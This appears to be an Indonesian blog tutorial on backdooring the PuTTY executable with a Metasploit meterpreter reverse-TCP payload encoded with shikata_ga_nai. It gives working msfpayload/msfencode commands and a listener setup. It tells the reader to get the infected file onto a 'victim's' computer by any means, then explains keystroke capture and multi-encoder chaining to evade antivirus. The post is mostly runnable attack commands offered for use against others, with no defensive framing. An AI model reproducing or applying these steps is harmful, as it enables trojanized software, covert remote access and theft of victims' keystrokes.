Filename | Membuat backdoor dengan shikata_ga_nai |
Permission | rw-r--r-- |
Author | Lutfi rahman |
Date and Time | 11.55 |
Label | |
Action |
1. Cara yang harus dilakukan adalah mendownload sebuah file yang nantinya akan di sisipi backdoor nantinya.
Saya mengambil contoh file putty, karena itu file sangat sering digunakan orang – orang
1 | deprito@WindwetaAyu:~$ wgethttp://the.earth.li/~sgtatham/putty/latest/x86/putty.exe |
2. Infeksi file yang akan dieksekusi dengan payload exploit.
Rubah nama putty.exe manjadi putty_ultimate.exe dan gunakan exploit x86/shikata_ga_nai.
1 | root@WindwetaAyu:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.7 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_ultimate.exe -e x86/shikata_ga_nai -c 5 |
3. Jalankan Metasploit dan buat listener agar ketika file yang kita buat diatas dieksekusi meterpreter akan langsung terbuka.
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost IP_KITA exploit
4. Entah bagaimana caranya copy file yang sudah diinfeksi diatas kedalam komputer korban,entah bagaimana caranya.
Ketika file dieksekusi maka secara otomatis meterpreter akan terbuka.
Sekarang, tinggal ekspolarasi
Note : Meterpreter akan mati, ketika program itu di close
5. Tambahan :
- Gunakan perintah keyscan_start dan untuk melihat hasil ketikan dari korban gunakan keyscan_dump.
- Pada tahap ke-2 apabila backdoor masih terdeteksi oleh Antivirus. Gunakan perintah ini.
root@WindwetaAyu:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.7 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c -8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86_jmp_call_additive -c 2 -t exe > /tmp/putty_ultimate.exe
Sekian tutorial dari saya
0 komentar:
Posting Komentar